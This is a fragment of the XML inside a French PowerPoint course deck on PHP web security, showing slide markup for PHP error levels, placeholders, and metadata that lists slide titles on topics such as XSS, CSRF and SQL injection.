          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>E_WARNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>E_NOTICE</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Thème Web2</Template>
  <TotalTime>15717</TotalTime>
  <Words>3002</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (4:3)</PresentationFormat>
  <Paragraphs>568</Paragraphs>
  <Slides>51</Slides>
  <Notes>7</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Thème</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titres des diapositives</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>51</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="52" baseType="lpstr">
      <vt:lpstr>Débit</vt:lpstr>
      <vt:lpstr>M 521 Web avancé</vt:lpstr>
      <vt:lpstr>Introduction à la sécurité PHP</vt:lpstr>
      <vt:lpstr>Constat d'un consultant en sécurité (HERVÉ SCHAUER CONSULTANT)</vt:lpstr>
      <vt:lpstr>Les attaques, ça sert à quoi ?</vt:lpstr>
      <vt:lpstr>Les attaques, ça sert à quoi ?</vt:lpstr>
      <vt:lpstr>Les attaques</vt:lpstr>
      <vt:lpstr>Comment un pirates peut connaitre le code source de l’application que j’utilise ?</vt:lpstr>
      <vt:lpstr>Code source accessible</vt:lpstr>
      <vt:lpstr>Gestion des erreurs</vt:lpstr>
      <vt:lpstr>Signalement des erreurs</vt:lpstr>
      <vt:lpstr>Register Globals</vt:lpstr>
      <vt:lpstr>Formulaires</vt:lpstr>
      <vt:lpstr>Cohérences des données : côté client</vt:lpstr>
      <vt:lpstr>Validation - Utilisation des données postées</vt:lpstr>
      <vt:lpstr>Validation - filtrage</vt:lpstr>
      <vt:lpstr>Validation de données</vt:lpstr>
      <vt:lpstr>Falsification des soumissions de formulaires</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting XSS</vt:lpstr>
      <vt:lpstr>XSS Risques</vt:lpstr>
      <vt:lpstr>XSS - exemple</vt:lpstr>
      <vt:lpstr>XSS – Solution </vt:lpstr>
      <vt:lpstr>XSS – Solution </vt:lpstr>
      <vt:lpstr>XSS – Solution</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgeries CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF - Solutions</vt:lpstr>
      <vt:lpstr>CSRF - Solutions</vt:lpstr>
      <vt:lpstr>Exposer des fichiers via url</vt:lpstr>
      <vt:lpstr>Inclusion de code distant (RFI)</vt:lpstr>
      <vt:lpstr>File upload</vt:lpstr>
      <vt:lpstr>File upload</vt:lpstr>
      <vt:lpstr>Sécuriser l’accès à la base de données</vt:lpstr>
      <vt:lpstr>Éviter les messages d’erreurs</vt:lpstr>
      <vt:lpstr>Injection SQL : principe</vt:lpstr>
      <vt:lpstr>Risques</vt:lpstr>
      <vt:lpstr>Se protéger contre l’injection</vt:lpstr>
      <vt:lpstr>Se protéger contre l’injection</vt:lpstr>
      <vt:lpstr>Protéger les données</vt:lpstr>
      <vt:lpstr>Rappels sur les sessions</vt:lpstr>
      <vt:lpstr>Vol de sessions (session hijacking)</vt:lpstr>
      <vt:lpstr>Session fixation</vt:lpstr>
      <vt:lpstr> Manipulation d’URL</vt:lpstr>
      <vt:lpstr>Configuration MySQL</vt:lpstr>
      <vt:lpstr>Quelques règles simples </vt:lpstr>
      <vt:lpstr>Configuration recommandée du  (php.ini)</vt:lpstr>
      <vt:lpstr>Configuration recommandée du  (php.ini) Suite</vt:lpstr>
      <vt:lpstr>Configuration recommandée du  (php.ini) Suite</vt:lpstr>
      <vt:lpstr>Google Hacks</vt:lpstr>
      <vt:lpstr>Mapper l’application</vt:lpstr>
      <vt:lpstr>Outils de tests d'intrusion </vt:lpstr>
      <vt:lpstr>Sources</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>UMRS INSERM 514</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Jérôme Cutrona</dc:creator>
  <cp:lastModifiedBy>Pctec</cp:lastModifiedBy>
  <cp:revision>1949</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-09-14T08:47:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-24T23:09:24Z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7</vt:i4>
  </property>
</Properties>
</file>